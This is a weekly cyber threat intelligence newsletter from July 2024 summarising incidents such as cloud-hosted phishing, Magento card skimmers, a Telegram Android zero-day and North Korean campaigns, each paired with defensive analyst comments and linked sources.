Intelligence

Intelphreak - 10:30Z July 29th, 2024

Threat Actors Use Cloud to Host Campaigns, LASC Network Compromise, E-Commerce Credit Card Skimmers, Evasive Panda Upgrades, “USDoD” CrowdStrike Breach, Videogame Used to Exfiltrate Data, Telegram Zero-Day, Selenium Grid Crypto Mining, Leidos Leak, New Report on North Korean Cyber Campaigns

ResidentGood
· 8 min read
Send by email
Presented By ResidentGood of Infophreak

Precedence: Routine
BLUF: Latin American Threat Actors Use Cloud Services to Host Phishing & Malware Campaigns, LA Superior Court Responds to Compromise of Their Entire Network, Threat Actors Hide Credit Card Skimmers in E-Commerce Websites, Evasive Panda Upgrades Its Tools & Targets Taiwanese and American NonGovernmental Organizations, Threat Actor “USDoD” Claims to Have Breached CrowdStrike Database of Threat Actor Information, Hacker Group Uses Videogame to Exfiltrate a Terabyte of Assets from Disney, Telegram Zero-Day Allows Delivery of Malicious .apk Files Disguised as Videos, Hackers Use Internet-Facing Selenium Grid Services to Mine for Cryptocurrency, US Prime Contractor Leidos Has Documents Leaked After Diligent Systems Breach, Many Federal Agencies & Companies Have Released Information on Recent North Korean Cybercrime & Intelligence Efforts

BEGIN TEARLINE

[Cybercrime] PINEAPPLE & FLUXROOT abuse Google Cloud for Credential Phishing:

A threat actor based in Latin America has been using serverless Google Cloud projects to host phishing pages that mimic Mercado Pago’s website1. The goal is to harvest credentials from users. FLUXROOT has also been seen in the wild using Azure & Dropbox to deploy trojans that target banks. Another actor, PINEAPPLE, has been using Google Cloud to host malware named “Astaroth” targeting users in Brazil. Google has taken down these malicious projects and added the sites to its Safe Browsing list of threats.

AC: The growing trend of using Cloud services to deploy malicious campaigns means it is easier than ever for threat actors to conduct crime with smaller infrastructures. Cloud providers must keep their finger on the pulse to protect their users from malicious uses of their infrastructure. On the user’s end, anti-phishing training is becoming more important for even consumer users. Training yourself to be wary of malicious URLs/domains and testing the links in a sandbox environment first can help you avoid victimization.

[Cybercrime] LA Superior Court Closes All Courts After Ransomware Attack:

The highest court in Los Angeles, the LA Superior Court had to close 36 courthouses after a ransomware attack took out their information systems2. External & internal systems were compromised by the unknown actor. They are working with several government entities to investigate the event. The said they haven’t found evidence of any data being breached.

AC: The LASC system has been attacked previously after a phishing attempt successfully compromised credentials. The swift action by the LASC is appropriate and the investigation seems to be comprehensive. The complex nature of this attack on their networks highlights the challenges government entities face. The attack appears to be run of the mill cybercrime, with no known statesponsorship or political motivations.

[Cybercrime] Threat Actors Plant Credit Card Skimmer Malware on Magento Websites:

Skimming malware has been detected on Magento checkout pages that exfiltrates credit card information to an attacker’s network3. The malicious domain uses a brand name to appear like it is sending data to a legitimate source. Due to how the software is designed, it persists after multiple removal attempts. It accomplishes this using temporary swap files created when files are edited via SSH. These swap files are meant to persist in case an editor crashes. Researchers have found copies of the malware among these temporary swap files4.

AC: This is a very sophisticated attack used for financial gain. The impact of this attack is massive. In a FBI & DHS report, over 2 million Magecart instances have been compromised by this attack5. If you have used a website that has Mageto or OpenCart plugins, it is best to monitor your cards for unusual activity.

[Cybercrime] Evasive Panda Using New Version of Macma Malware & Windows Backdoor:

Symantec has released a report detailing the recent activities of a Chinese-sponsored threat actor going by the names: “Evasive Panda”, “Daggerfly”, and “Bronze Highland.” They mainly target Taiwanese organizations and American NGOs in China with cyber espionage campaigns6. They have recently updated their MgBot malware, used a MacOS backdoor called Macma, and used the Nightdoor Windows backdoor. Their campaigns span almost all major operating systems, even SolarisOS7. A Macma C2 server was attributed to the IP of a known MgBot deployment server.

AC: This comprehensive security research displays the immense infrastructure capabilities of this APT group. They can quickly adapt to changes in many environments. If your organization has systems in Taiwan or China, strict endpoint security measures are highly recommended. Having a Threat Intelligence solution to stay ahead of malicious IPs and malware can also defend against groups such as these.

[Cybercrime] CrowdStrike Threat Actor Database Leaked After Outage:

A threat actor going by the monicker “USDoD” has been seen on leak forums trying to sell a list of threat actors leaked from CrowdStrike after the outage8. CrowdStrike has said that these claims are most likely false. The sample data from the leak contain information on APT backgrounds, methodology, and incident reports. The breach allegedly contains over 250M records.

AC: The CrowdStrike outage was a cornucopia for hacking groups. Malicious actors have been seen capitalizing on the event to deploy RATs and malware. A breach such as this would not be outside the realm of possibility. If this breach is legitimate, it could drastically set back efforts to track the behavior of APTs.

[Cybercrime] Hackers Use Trojan in Driving Videogame to Compromise Disney:

The hacking group Nullbulge used the popular driving simulator BeamNG.drive to install a Remote Access Trojan on the system of a senior Disney employee9. Over a terabyte of informational assets were exfiltrated from Disney’s systems before they cut off access. The malware was delivered through a mod to the game, not any flaw in the game itself.

AC: This is a very interesting case of compromise. While playing games during down time on corporate systems is common, this event shows the security risks of allowing such use. Modification of acceptable use policy could potentially mitigate the risks of such attacks. However, the organization would have to also accommodate the legitimate uses of running games on corporate computers. Disney also develops games and would not want to enact policy that disrupts this development.

[Research] Zero-day in Telegram for Android:

A zero-day was discovered in the Android version of the popular messaging app Telegram by researchers at ESET10. The vulnerability allows malicious actors to deploy custom android packages (.apk) to users on Telegram that appear as videos. The user would tap on the video, and it would download the malicious .apk on the user’s device. Luckily, after multiple clicks the user must also allow installation of third-party apps for the vulnerability to be exploited. It has not been exploited in the wild yet however threat actors have had days to exploit it before its discovery.

AC: Since someone has attempted to sell this zero-day, it is possible it has been exploited in the wild. The multiple user interactions required for full compromise means this zero-day is not a severe risk. In the solutions you use to manage mobile devices, not enabling the user to install apps outside of the approved app store would mitigate this risk entirely. Even personal users should avoid installing thirdparty apps on their mobile devices. If you are a developer or researcher, sandbox devices are recommended to stay secure in even the worst case scenario.

[Research] Hackers Exploit Selenium Automated Web Testing Services for Crypto Mining:

Researchers from the security firm Wiz have discovered a crypto mining campaign targeting exposed instances of Selenium Grid, part of the web testing framework Selenium11. Selenium Grid is not meant to be exposed to the internet and defaults to no authentication requirements. This means default installations of Selenium Grid that are accessible via the Internet can be abused by hackers to run mining processes parallel to normal processes.

AC: This could all be avoided by hardening of internet-facing systems. If software is not designed to be exposed to the public, it presents a high possibility of vulnerability. Anywhere authentication can be enabled on a public system, it should be. The affected systems seem to mostly be poorly configured instances that were not hardened. Tracking trends in resource usage, noting unusual patterns can also be an effective way to catch crypto mining operations.

[National Security] Hackers Leak Data From US Defense Contractor Leidos:

Private, internal documents from Leidos have been leaked publicly. Leidos is a prime US federal contractor that handles IT systems (primarily for the US Department of Defense)12. Leidos has been open about its investigation, making a statement that they believe the documents were attained during a compromise of Diligent Corp. in 2023. Leidos used these systems to host documents on internal investigations.

AC: These documents may or may not have significant impacts to US National Security. Since Leidos only stored information on internal investigations on these compromised systems, it is possible nothing that dangerous was leaked. Ultimately this problem stems from the massive degree of moving parts that exist in these federal information systems. A subsidiary of Diligent Corp, Steele Compliance Solutions had an incident that led to the compromise of many Diligent information systems, which led to this leak of confidential documents. It important to remember that security of your system also relies on the security of other integrated systems. If your subsidiary was compromised, chances are you could be next.

[National Security] North Korean Infiltration & Cyber Espionage:

North Korea has been carrying out extensive cyber espionage strategies targeting western governments. A North Korean hacker group known as Andariel/Onyx Sleet has been carrying out ransomware attacks against healthcare companies to fund their operations14. The actors use a wide variety of tools to execute code remotely, move laterally in a system, and exfiltrate confidential data. The proceeds from these campaigns fund other North Korean cyber espionage operations targeting entities across the globe spanning industrial, military, government, technology, and energy sectors15. North Koreans have even infiltrated IT organizations using AI to enhance stock photography and attain remote jobs13. Recently this occurred at KnowBe4 when they hired an IT intern that turned out to have faked his information. They report no data was breached and they were able to catch the incident quite quickly.

AC: These reports show the length that North Korea will go to maintain its intelligence capabilities. They make up for their lack of industrial economy with advanced cybercrime attacks that go to fund their military operations. They use these same advanced cyber capabilities to conduct espionage on organizations across many countries including the US, the UK, Japan, India, Taiwan, and even domestically. CISA & the FBI recommend organizations that handle critical infrastructure to take the following actions: apply patches as soon as you can, harden your web servers against remote shells, monitor your endpoints for potentially malicious behavior, and ensure you have strong authentication (especially for remote access).

END TEARLINE

Final Analyst Comments:
It has been a busy week for cybercriminals. The ability for threat groups to advance is growing at an accelerating pace. The ubiquity of cloud services allows for attackers to carry out larger campaigns with less resources. The immense complexity of many production information systems means a larger attack surface that is harder to keep track of as subsidiaries & vendors become vulnerable. Even something as simple as playing the wrong videogame on the wrong computer can result in massive security incidents. Intelligence systems & processes are becoming more necessary for even smaller organizations who may not have these capabilities. Threat intelligence solutions can help automate some security research and help take some of the burden of security off the organization itself. The extensive cyber campaigns from North Korea show us how the growing tensions between world powers can have severe impacts in the cyber space. A country that is desperate can leverage cyber attacks to gain crucial information on nuclear programs, gain intelligence on military activities, and steal large sums of money to fund their own government. The risks presented by these state actors runs over into the private sector, making it concern for even normal businesses. Information security is rising to the top of the list of concerns for businesses navigating today’s digital economy.

Analyst: ResidentGood

END REPORT

If you are interested in anything Cybersecurity, come check out our discord

Sources:

  1. https://thehackernews.com/2024/07/pineapple-and-fluxroot-hacker-groups.html?m=1
  2. https://www.bleepingcomputer.com/news/security/los-angeles-superior-court-shuts-downafter-ransomware-attack/
  3. https://thehackernews.com/2024/07/magento-sites-targeted-with-sneaky.html?m=1
  4. https://securityaffairs.com/166073/malware/threat-actors-abused-swap-files-eskimming.html
  5. https://securityaffairs.com/92899/cyber-crime/fbi-cisa-e-skimming-attacks.html
  6. https://www.bleepingcomputer.com/news/security/evasive-panda-hackers-deploy-newmacma-macos-backdoor-version/
  7. https://securityaffairs.com/166102/apt/daggerfly-macma-macos-backdoor.html
  8. https://cyberpress.org/hackers-group-allegedly-leaked-threat-actor-list-from-crowdstrike/
  9. https://www.thedrive.com/news/culture/hackers-exploited-a-pc-driving-sim-to-pull-offmassive-disney-data-breach
  10. https://www.bleepingcomputer.com/news/security/telegram-zero-day-allowed-sendingmalicious-android-apks-as-videos/
  11. https://thehackernews.com/2024/07/ongoing-cyberattack-targets-exposed.html
  12. https://www.reuters.com/technology/cybersecurity/hackers-leak-documents-pentagon-itservices-provider-leidos-bloomberg-news-2024-07-23/
  13. https://blog.knowbe4.com/how-a-north-korean-fake-it-worker-tried-to-infiltrate-us
  14. https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a
  15. https://thehackernews.com/2024/07/us-doj-indicts-north-korean-hacker-for.html?m=1

Written by ResidentGood

Cyber Threat Intelligence, Digital Forensics, OSINT

Keep reading